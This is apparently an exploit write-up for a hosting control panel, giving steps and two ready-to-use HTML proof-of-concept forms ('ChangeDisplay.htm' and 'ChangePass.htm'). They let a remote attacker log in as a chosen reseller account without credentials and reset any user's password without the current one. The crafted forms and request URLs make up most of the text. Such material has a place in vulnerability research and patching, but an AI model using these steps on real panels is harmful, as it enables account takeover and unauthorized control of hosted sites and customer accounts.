1-[Remote Attacker] can login to hosting controller Panel. He can also change all others' passwords:
1.1- http://[HC URL]/hosting/addreseller.asp?reseller=[USERNAME] -> for ex. [USERNAME]= resadmin
1.2- Now, to login without changing the password, attacker must run "ChangeDisplay.htm" then redirect to "main.asp"
~~~~~~~~~~~~~~~~1.2.1 ChangeDisplay.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
_action = '/AdminSettings/displays.asp?DecideAction=1&ChangeSkin=1'
frmDisplay.action = window.document.all.URL.value + _action
return true;
}
</script>
URL: <input type="text" name="URL" />
<form name="frmDisplay" action="" method="post" onsubmit="return check()">
<input type="hidden" name="TemplateSkin" value="PanelXP/Blue" />
<input type="submit" />
</form>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.3- Attacker, also can change username's password without having current password by "ChangePass.htm"
~~~~~~~~~~~~~~~~1.3.1 ChangePass.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
_action = '/Accounts/AccountActions.asp?ActionType=UpdateUser'
frmChangePass.action = window.document.all.URL.value + _action
return true;
}
</script>
URL: <input type="text" name="URL" /><br />
<form name="frmChangePass" action="" method="post" onsubmit="return check()">
UserName: <input type="text" name="UserName" value="[USERNAME]" /> <br />
FullName: <input type="text" name="FullName" value="[USERNAME]" /> <br />
Description: <input type="text" name="Description" value="Something" /> <br />
Password: <input type="text" name="Pass1" value="" /> <br />
Confirm Password: <input type="text" name="ConfPass" value="" /> <br />
<input type="hidden" name="DefaultDiscount" value="0" />
<input type="hidden" name="CreditLimit" value="0" />
<input type="hidden" name="ActionType" value="AddUser" />
<input type="hidden" name="PassCheck" value="TRUE" />
<input type="submit" />
</form>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~